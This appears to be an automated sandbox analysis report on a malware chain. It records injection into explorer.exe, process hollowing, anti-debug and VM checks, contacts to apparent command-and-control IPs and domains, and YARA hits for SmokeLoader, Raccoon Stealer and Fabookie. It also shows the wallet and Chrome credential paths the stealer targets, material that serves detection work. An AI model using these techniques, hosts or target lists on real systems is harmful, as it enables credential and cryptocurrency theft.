Source: llpb1133.exe, 00000014.00000003.441864243.00000000004D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 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
Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441951171.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.0000000000874000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464370990.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464370990.0000000000874000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000004.00000000.302351871.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000004.00000000.290527943.0000000007166000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000004.00000000.302351871.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 00000004.00000000.302351871.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: 98D7.exe, 00000010.00000003.432685458.00000000004D6000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.442114467.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.432213204.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.437159148.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.435558228.00000000004D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gzFbr+jNKB4R9+J0Q68PjPEPmg3RG1L8sOSIbvG8sOt70gs6qkbl5XK7CaN3xmg4kDoUp6ziOmGMNQO/MUKC/dPib2qWsWHMeuqkZrVkwsBYrdFhrleaplFJHdGaSzOLek1PjbVbJj5NmRXdTZ7CCOeiVOOLuFTy/gmIgzgQXkdUeJIUzJYmMrfJGPSigOHUcDC6ETCE8oGxRuMk1CT8M141yktHtJYm0cQRh0M4ZdbhF347Iz47GMACzBvVagpPp2YbuCs5opcNmnYEz5hMaLmj9QWoC+y/nUT0eNErzqNe4dFmxqCDl3ANI3p40jH45bQJSZhZaehn3PcoUqLZrB1dJnkiiesRX8BPnC7SNJ55C2B1yCeMSgVqVseSgy6eh1blGReXoN/4Cs17Acy54j0rau2kgRodmq0ioocgcNjRVQw+QRds1cbdcvZFvaqjrinY9jpyWOUSRxtmVov7gPB6DEqxiovmOQnjjH6+xYtwxKg4vcFOG7Pwm2yt3oKCjC+CoafPiLkbVrcAppM4K/CBdsyoG9ailH8Q0+l6yQT03XRxuDMm9thoPvTpCMwS7GjMBAMZQROcgzy5j4jzehtoYhbgg/uEiV+haxY0Y5AA3t/eWSokxoWm2a5XjuktGCie5yPQbsKBr3PoLfHgOfk4GNHABPApXYjABIUJlQVeDDAsl1K2C+CUXm+LOU50Dq6ZM0ATVCbqOO3YBGcj0dHhzknOo1FvOXXFKaJiU2MWIBG/LTtFfKuIGxSHYOnjABqgAsHEfu3OrKLnnC7CpAH9CJoEeyY8kAR7ipFJs3VDcHt5Zy0AzvPmk9VEvdFuDYjv5kWm4qr6AaxUEzYcZjPl0mUidilnhGLFYZ3CT0v4A6W4BybOMnyJsXgyZDEBms6nxmAmqFASb2a9cniFd1WShAuTwy4azZ2s7TEdmMYHqp3Q1qriAFImdAb1wPj0LK+XKeiS7aaYX8fxpchpGLJGHWazeezetpfT0VpJr1Q64QgHcMbnwZFQ23TTPL8ycERvYa+v2DGlUmLdRcUa8JvlNv5MnW63qrAoY3MIz4XFdquCuB2O8Saf5uD5XB2XhlSnr7sk3grNdoMQC7oFCiSCM8L5RJ4SH80ehgFST82YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6YRFe2KQ0yHIM1qIYj7zj0oSZW5Slt2VgQs8hx01yo6lDVFhiRuON0sQwcb2qNRei3qWLNNFuLdVjjUrzAJ0FHvbwSyBCVdgqWL7Ek2ZfQH2majYYubCIrUCQ2I0bzay8s4kA+AcPNbK6MV3HX0LSc5ymtbjTawsGRGFd2ulQpExVMmjfsHcEAnyDE6s9/TukwBiopsUBAA6V4PZM0sHF4NzVg/RhrGAPuvFXQq9gEMA1ZA8Toc7o7D6Bnz5z8s4kBsCyk2dh+/YI5Ql1g2oRl70R45AWYOpCIrHyOmTExLB+MVDS93CSkucWzaXeY0DP5Al7hNGcCPm7WdU6YLZycMqwaZj1RF/HiYKopVo1ap/KmxOZyAA10YTTzVoON55LbNU9qKzCFpGA5bFS1lXFYb+GJ26BO9rgqnzEqujmAAnxhsKAvzJgN/qrRqasBO2qjbfiYTSCUteopvYX52cPCAiIMPjcaCjyaS9APl/TZZjXVQd6ZDAcwLjKH7UwdHYrUTfhLM259r
Source: 98D7.exe, 00000010.00000002.602257740.00000000004F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Fbr+jNKB4R9+J0Q68PjPEPmg3RG1L8sOSIbvG8sOt70gs6qkbl5XK7CaN3xmg4kDoUp6ziOmGMNQO/MUKC/dPib2qWsWHMeuqkZrVkwsBYrdFhrleaplFJHdGaSzOLek1PjbVbJj5NmRXdTZ7CCOeiVOOLuFTy/gmIgzgQXkdUeJIUzJYmMrfJGPSigOHUcDC6ETCE8oGxRuMk1CT8M141yktHtJYm0cQRh0M4ZdbhF347Iz47GMACzBvVagpPp2YbuCs5opcNmnYEz5hMaLmj9QWoC+y/nUT0eNErzqNe4dFmxqCDl3ANI3p40jH45bQJSZhZaehn3PcoUqLZrB1dJnkiiesRX8BPnC7SNJ55C2B1yCeMSgVqVseSgy6eh1blGReXoN/4Cs17Acy54j0rau2kgRodmq0ioocgcNjRVQw+QRds1cbdcvZFvaqjrinY9jpyWOUSRxtmVov7gPB6DEqxiovmOQnjjH6+xYtwxKg4vcFOG7Pwm2yt3oKCjC+CoafPiLkbVrcAppM4K/CBdsyoG9ailH8Q0+l6yQT03XRxuDMm9thoPvTpCMwS7GjMBAMZQROcgzy5j4jzehtoYhbgg/uEiV+haxY0Y5AA3t/eWSokxoWm2a5XjuktGCie5yPQbsKBr3PoLfHgOfk4GNHABPApXYjABIUJlQVeDDAsl1K2C+CUXm+LOU50Dq6ZM0ATVCbqOO3YBGcj0dHhzknOo1FvOXXFKaJiU2MWIBG/LTtFfKuIGxSHYOnjABqgAsHEfu3OrKLnnC7CpAH9CJoEeyY8kAR7ipFJs3VDcHt5Zy0AzvPmk9VEvdFuDYjv5kWm4qr6AaxUEzYcZjPl0mUidilnhGLFYZ3CT0v4A6W4BybOMnyJsXgyZDEBms6nxmAmqFASb2a9cniFd1WShAuTwy4azZ2s7TEdmMYHqp3Q1qriAFImdAb1wPj0LK+XKeiS7aaYX8fxpchpGLJGHWazeezetpfT0VpJr1Q64QgHcMbnwZFQ23TTPL8ycERvYa+v2DGlUmLdRcUa8JvlNv5MnW63qrAoY3MIz4XFdquCuB2O8Saf5uD5XB2XhlSnr7sk3grNdoMQC7oFCiSCM8L5RJ4SH80ehgFST82YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6YRFe2KQ0yHIM1qIYj7zj0oSZW5Slt2VgQs8hx01yo6lDVFhiRuON0sQwcb2qNRei3qWLNNFuLdVjjUrzAJ0FHvbwSyBCVdgqWL7Ek2ZfQH2majYYubCIrUCQ2I0bzay8s4kA+AcPNbK6MV3HX0LSc5ymtbjTawsGRGFd2ulQpExVMmjfsHcEAnyDE6s9/TukwBiopsUBAA6V4PZM0sHF4NzVg/RhrGAPuvFXQq9gEMA1ZA8Toc7o7D6Bnz5z8s4kBsCyk2dh+/YI5Ql1g2oRl70R45AWYOpCIrHyOmTExLB+MVDS93CSkucWzaXeY0DP5Al7hNGcCPm7WdU6YLZycMqwaZj1RF/HiYKopVo1ap/KmxOZyAA10YTTzVoON55LbNU9qKzCFpGA5bFS1lXFYb+GJ26BO9rgqnzEqujmAAnxhsKAvzJgN/qrRqasBO2qjbfiYTSCUteopvYX52cPCAiIMPjcaCjyaS9APl/TZZjXVQd6ZDAcwLjKH7UwdHYrUTfhLM259
Source: explorer.exe, 00000004.00000000.285953189.0000000005063000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: 98D7.exe, 00000010.00000003.480306540.0000000000513000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000513000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: explorer.exe, 00000004.00000000.302351871.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: 98D7.exe, 00000010.00000003.431710822.000000000051E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: M8L5RJ4SH80ehgFST82YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6Y@sR
Source: llpb1133.exe, 00000014.00000003.520897937.00000000004A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\explorer.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00428390 FindFirstFileExW, 11_2_00428390
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0092B91D push dword ptr fs:[00000030h] 0_2_0092B91D
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_0041E1B1 mov ecx, dword ptr fs:[00000030h] 11_2_0041E1B1
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_0042950B mov eax, dword ptr fs:[00000030h] 11_2_0042950B
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00413DCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00413DCA
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_0042BCAF GetProcessHeap, 11_2_0042BCAF
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00414035 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_00414035
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00413DCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00413DCA
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00417E53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00417E53
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00413F2C SetUnhandledExceptionFilter, 11_2_00413F2C

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 37.34.248.24 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: perficut.at
Source: C:\Windows\explorer.exe Domain query: potunulit.org
Source: C:\Windows\explorer.exe Network Connect: 190.219.54.242 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 23.106.124.133 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 195.158.3.162 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 158.69.96.67 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 77.73.134.27 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: flytourchip.com.br
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: D8D3.exe.4.dr Jump to dropped file
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\file.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E4.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E4.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\3046.exe Memory written: C:\Users\user\AppData\Local\Temp\3046.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe Memory written: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\3046.exe Memory written: C:\Users\user\AppData\Local\Temp\3046.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe Memory written: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe base: 400000 value starts with: 4D5A
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\file.exe Thread created: C:\Windows\explorer.exe EIP: 5791B14 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E4.exe Thread created: unknown EIP: 58A19A0 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe Section unmapped: unknown base address: 400000
Source: C:\Users\user\AppData\Local\Temp\3046.exe Section unmapped: unknown base address: 400000
Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe Section unmapped: unknown base address: 400000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process created: C:\Users\user\AppData\Local\Temp\3046.exe C:\Users\user\AppData\Local\Temp\3046.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process created: C:\Users\user\AppData\Local\Temp\llpb1133.exe "C:\Users\user\AppData\Local\Temp\llpb1133.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process created: C:\Users\user\AppData\Local\Temp\pliu.exe "C:\Users\user\AppData\Local\Temp\pliu.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process created: C:\Users\user\AppData\Local\Temp\XandETC.exe "C:\Users\user\AppData\Local\Temp\XandETC.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe Process created: unknown unknown
Source: explorer.exe, 00000004.00000000.284328981.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 00000004.00000000.284328981.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.302351871.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.290368021.0000000006770000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.284328981.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.284034500.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CProgmanile
Source: explorer.exe, 00000004.00000000.284328981.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 11_2_0042B0E9
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: EnumSystemLocalesW, 11_2_0042B3D6
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: EnumSystemLocalesW, 11_2_0042B38B
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: EnumSystemLocalesW, 11_2_0042B471
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: GetLocaleInfoW, 11_2_00423431
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 11_2_0042B4FC
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: GetLocaleInfoW, 11_2_0042B74F
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 11_2_0042B878
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: GetLocaleInfoW, 11_2_0042B97E
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 11_2_0042BA4D
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: EnumSystemLocalesW, 11_2_00422F0B
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Queries volume information: C:\Users\user\AppData\Local\Temp\A33B.exe VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00413A75 cpuid 11_2_00413A75
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_00413CC0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 11_2_00413CC0
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_004041D0 SHGetFolderPathA,GetModuleFileNameA,GetComputerNameA,GetUserNameA, 11_2_004041D0

Stealing of Sensitive Information
barindex
Yara detected SmokeLoader
Source: Yara match File source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Yara detected Raccoon Stealer v2
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.464907460.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.464370990.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.462319085.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.464693455.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.441770993.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.444370287.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.446299900.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: D8D3.exe PID: 5128, type: MEMORYSTR
Yara detected Fabookie
Source: Yara match File source: Process Memory Space: llpb1133.exe PID: 2560, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: wlts_electrum:Electrum;26;Electrum\wallets;*;-
Source: D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: wlts_elecbch:ElectronCash;26;ElectronCash\wallets;*;-
Source: D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: wlts_jaxxl:JaxxLiberty;26;com.liberty.jaxx;*;*cache*
Source: D8D3.exe, 00000013.00000003.517099850.000000000084F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\exodus\*w
Source: D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: wlts_exodus:Exodus;26;exodus;*;*partitio*,*cache*,*dictionar*
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
